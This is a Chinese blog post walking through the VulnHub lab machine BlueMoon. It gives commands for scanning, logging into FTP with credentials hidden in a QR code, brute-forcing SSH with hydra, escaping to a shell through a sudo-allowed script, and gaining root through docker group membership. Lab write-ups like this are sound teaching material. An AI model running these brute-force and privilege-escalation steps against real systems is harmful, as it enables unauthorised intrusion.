VulnHub:BlueMoon

已于 2024-08-17 10:54:23 修改
阅读量959 收藏 30
点赞数 13
分类专栏: VulnHub 文章标签: web安全 网络安全 linux 安全 笔记
于 2024-08-14 18:29:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aukum/article/details/141197084
版权

准备工作

靶机下载地址,下载完成后使用virtualbox打开虚拟机,网络设置修改为桥接。

信息收集

主机发现

攻击机ip:192.168.31.218,nmap扫描攻击机同网段存活主机。

nmap 192.168.31.0/24 -Pn -T4

目标靶机ip为:192.168.31.228

端口扫描

nmap 192.168.31.228 -A -p- -T4

目标靶机开放了21,22,80端口。

  1. 21端口ftp服务,vsftpd 3.0.3

  2. 22端口ssh服务,OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

  3. 80端口http服务,Apache httpd 2.4.38

web站点信息收集

访问http服务,首页如下:

没什么信息,目录扫描dirsearch -u http://192.168.31.228,没信息,换个字典。

dirsearch -u http://192.168.31.228 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

找到一个隐蔽的目录hidden_text。访问结果如图:

Thank You指向另一个路径,访问得到一个二维码。

扫描内容如下:

#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

渗透

FTP登录

根据web信息收集中二维码扫描内容,可知涉及FTP的简单的shell脚本的使用,ftp用户名是userftp,密码是ftpp@ssword,直接登录即可。这里我写的shell脚本,来显示文件列表(纯纯试一下ftp的简单shell脚本如何使用,都给出了用户名和密码直接登录即可,最终目的就是拿到ftp服务器中的两个文件)

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary                          # 设定传输方式为二进制方式
pwd                             # 查看FTP服务器上的当前工作目录
ls                              # 显示文件列表
bye                             # 退出ftp会话
EOF

执行shell脚本得到ftp当前工作目录,和文件列表。

修改一下shell脚本,下载FTP服务器上的文件。

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary  
get information.txt
get p_lists.txt
bye                             
EOF

执行脚本得到一个字典文件p_lists.txt和information.txt,information.txt内容如下:

Hello robin ...! I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.

存在一个用户robin,并给出了密码字典,爆破吧。

ssh爆破

给出了用户名和字典,hydra爆破ssh。

hydra -l robin -P p_lists.txt ssh://192.168.31.228

得到密码:k4rv3ndh4nh4ck3r

ssh登录过程中有点小问题,提示WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! ,解决方法如下:

ssh-keygen -R 192.168.31.228

之后正常登录即可。

get user1.txt!

接下来找到了user2.txt,但是仅jerry才有读权限。

提权

sudo提权

sudo提权,sudo -l,发现可以通过/home/robin/project/feedback.sh提权到jerry。

feedback.sh当前仅有rx权限,放弃写入反弹shell的方法,直接执行,提示需要输入名字和目标机器。

sudo -u jerry ./feedback.sh

Enter Your Name:随便填一个
Enter You FeedBack About This Target Machine:/bin/bash

成功切换到jerry,注意到jerry用户加入了docker用户组。

获得一个交互式shell。

python3 -c 'import pty;pty.spawn("/bin/bash")'

get user2.txt!

docker容器提权

当前jerry用户是普通用户,且加入了docker组。有一个提权方式——普通用户利用docker容器提权。

补充:为什么能利用docker容器提权?因为用户创建一个docker容器后,容器内默认是root账户,会自动在命令前添加sudo。一个普通用户只要加入docker组就等同于root。

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

提权成功。

get root.txt!🎆

Aukum
关注
  • 13
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub-BLUEMOON: 2021靶机
NeverForgetCX的博客
03-29 5074
前言: 时隔二十多天我又来了,到vulnhub上随便下了个靶机进行打靶试试。 kali:192.168.22.140 靶机IP:192.168.22.144 信息收集: 扫描靶机IP: arp-scan -l 获得靶机ip: 扫描靶机开放的端口和服务: nmap -A -p 1-65535 192.168.22.144 看见开放的端口是21,22,...
Vulnhub: BlueMoon: 2021靶机
qq_43884092的博客
08-03 158
二维码泄露ftp用户密码,ssh爆破,sudo提权,docker组提权
vulnhubBLUEMOON: 2021
qwweggfe的博客
08-10 418
信息搜集: 首先进行目录扫描 进行端口扫描 nmap -sC -sV -p- 192.168.181.148 --min-rate=2000 开启了21,22,和80端口,于是打开网页进行查看 进行目录探测 gobuster dir -u http://192.168.181.148/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,bak,txt,html -t 20 扫..
vulnhub靶机bluemoon
m0_73248913的博客
01-23 413
vulnhub靶机
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
Aluxian_的博客
10-26 671
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagEasy (简单的)1.信息收集工具得使用2.提权命令的使用3.FTP下载、hydra爆破、SSH登入 渗透的流程思路🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
BLUEMOON: 2021
wanguixiu的博客
06-11 555
BLUEMOON: 2021 作者: admin 时间: 2021-06-10 分类: vulnhub靶场 fping -g 192.168.137.1/24 # step1 扫主机,找到靶场131 nmap -A -p 1-65535 -v 192.168.137.131 # step2 扫端口,扫到21,22,80 dirb http:/...
vulnhub靶场之bluemoon
weixin_42478365的博客
04-28 746
sudo切换用户,docker提权,文件配置信息泄露
从Docker挂载逃逸原理复现分析到BlueMoon实战
蚁景网安学院
04-26 482
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。
bluemoon_2021靶机详解
weixin_44681307的博客
07-18 184
我做这个靶场时候其实提权遇到了很多问题,最后没想到是shell的原因,后来重新建立了个shell就提权成功了,很简单的一个靶场。并且我们发现jerry用户是运行着一个docker的,因为以前见到过docker提权,所以就找了一条docker提权的命令。点击Thank You …cd到feedback.sh所在的文件,查看一下这个.sh文件,最后一行是我自己加的,请忽略。靶机的主页面并没有太多东西,但是这个图片里面是隐写了东西的,这里是个误导,我还研究了半天。然后我又扫描了一下目录,发现有一个奇怪的目录。
BlueMoon:BlueMoon Js是初学者的Javascript备忘单
05-06
"BlueMoon: BlueMoon Js是初学者的Javascript备忘单"这个资源可能是为了帮助新手快速掌握JavaScript的基础知识,以便他们能够创建功能丰富的网页或应用程序。 JavaScript语法基础: 1. 变量:JavaScript中的变量...
BlueMoon后台管理模板html模板
12-04
"BlueMoon后台管理模板html模板"是一款专为构建企业级后台管理系统设计的HTML5模板,其特点是界面清晰、布局合理,适用于开发人员快速搭建后台界面。这个模板包含了多个页面和功能模块,帮助开发者轻松实现各种后台...
bluemoon响应式后台模板
06-01
"Bluemoon响应式后台模板"是一款专为后端开发者和网页设计师设计的专业网站源码,具有高度的灵活性和适应性。响应式设计是其核心特性,这意味着该模板能够根据用户使用的设备(如桌面、平板或手机)自动调整布局和...
Bluemoon Helper-crx插件
04-02
Bluemoon Helper-crx插件是一款专为英语用户设计的工具,主要用于增强与Bluemoon相关的功能,特别是处理和管理合并字段。在IT领域,插件是软件的一种扩展,它能添加新功能或改进现有应用的性能,通常是为了满足特定...
PJBlog2 BlueMoon
12-19
【标题】"PJBlog2 BlueMoon"是一款基于PJBlog2平台的网页模板,设计主题为“BlueMoon”,它为用户提供了一种美观、简洁且功能丰富的博客界面风格。这款模板以其蓝色调为主,营造出宁静而深邃的月夜氛围,为用户在...
网络安全网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
一定要站在自己热爱的生活里闪闪发光
08-27 171
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
网络安全】XML-RPC漏洞之盲SSRF
最新发布
等风来
08-27 83
我收到的响应是这样的,响应体中的状态为0,表示请求已成功发送:
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-23 1143
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
08-23 1466
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
p em{color:blue }
06-14
`p em{color:blue}`是一段CSS样式定义,它表示选择器`p em`所匹配的元素内部的文本颜色设置为蓝色。这里`p em`是一个后代选择器,会匹配所有在`<p>`元素内部的`<em>`元素,并将它们的文本颜色设置为蓝色。例如,下面的HTML代码: ``` <p>这是一段包含强调的文本。</p> ``` 会被上述CSS样式定义所影响,使得`<em>`元素内部的文本颜色变为蓝色。 需要注意的是,后代选择器会匹配所有符合条件的后代元素,而不仅仅是直接子元素。如果希望只匹配直接子元素,可以使用子选择器(`>`)来代替后代选择器。例如,`p > em {color:blue}`表示只匹配`<p>`元素的直接子元素中的`<em>`元素。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值